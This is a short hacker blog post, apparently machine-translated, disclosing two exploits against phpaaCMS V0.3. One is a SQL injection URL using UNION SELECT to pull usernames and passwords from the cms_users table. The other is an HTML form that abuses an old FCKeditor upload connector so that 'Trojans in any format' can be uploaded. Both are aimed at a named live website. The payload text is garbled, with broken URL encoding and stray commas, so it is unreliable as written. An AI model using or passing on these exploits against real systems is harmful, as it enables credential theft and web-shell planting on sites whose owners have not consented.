PhpaaCMS V0.3 Injection Vulnerability

H4ckx7s Blog

By accident, a php station was passing by. Because I seldom studied PHP, I looked at phpaaCMS rather than a large CMS, and habitually added "" to the back. I did not expect an error!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1

// You have already entered your SQL syntax error. Check the manual. Line 1 corresponding to the correct use of your MySQL syntax near the server version

Haha, now that something went wrong, it should be done. Continue to guess the order by field and the result field is 15, but you do not know the database, the official database is cms_cms_users in fields 3 and 11, respectively, username and password.

The obtained statement is: and % 201 = 2% 20 union % 20 select % ,,2, username, 10, password, from % 20cms_users.

This also exists on the official website:

EXP:

Http://www.phpaa.cn/demo/phpaaCMS/show.php? Id = 155% 20and % 201 = 2% 20 union % 20 select % ,,2, username, 10, password, from % 20cms_users

Vulnerability 2:

After entering the background, there is a php Fckeditor Editor Version below 2.4.2.

EXP

<Form id = "frmUpload" enctype = "multipart/form-data"
Action = "http://www.phpaa.cn/include/fckeditor/editor/filemanager/connectors/php/upload.php? Type = Media "method =" post "> Upload a new file: <br>
<Input type = "file" name = "NewFile" size = "50"> <br>
<Input id = "btnUpload" type = "submit" value = "Upload">
</Form>

You can upload Trojans in any format!

By H4ckx7